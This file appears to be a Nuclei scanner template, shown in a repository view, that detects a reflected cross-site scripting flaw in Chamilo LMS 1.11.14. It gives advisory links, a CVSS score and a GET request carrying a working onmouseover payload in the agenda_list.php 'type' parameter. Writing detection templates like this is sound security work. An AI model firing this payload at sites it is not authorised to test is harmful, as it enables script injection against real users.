nuclei-templates/vulnerabilities/other/chamilo-lms-xss.yaml

37 lines
1.0 KiB
YAML
Raw Normal View History

2021-02-01 20:54:21 +00:00
id: chamilo-lms-xss
info:
name: Chamilo LMS 1.11.14 Cross-Site Scripting
2021-02-01 20:54:21 +00:00
author: geeknik
severity: high
description: Chamilo LMS 1.11.14 is vulnerable to cross-site scripting.
reference:
- https://www.netsparker.com/web-applications-advisories/ns-21-001-cross-site-scripting-in-chamilo-lms/
- https://support.chamilo.org/projects/chamilo-18/wiki/Security_issues#Issue-45-2021-01-21-Moderate-impact-moderate-risk-XSS-vulnerability-in-agenda
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cwe-id: CWE-79
tags: xss,chamilo
2021-02-01 20:54:21 +00:00
requests:
- method: GET
path:
2021-04-28 09:12:10 +00:00
- '{{BaseURL}}/main/calendar/agenda_list.php?type=xss"+onmouseover=alert(document.domain)+"'
2021-02-01 20:54:21 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
2021-04-28 09:12:10 +00:00
- 'agenda_js.php?type=xss" onmouseover=alert(document.domain)'
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"
# Enhanced by mp on 2022/04/08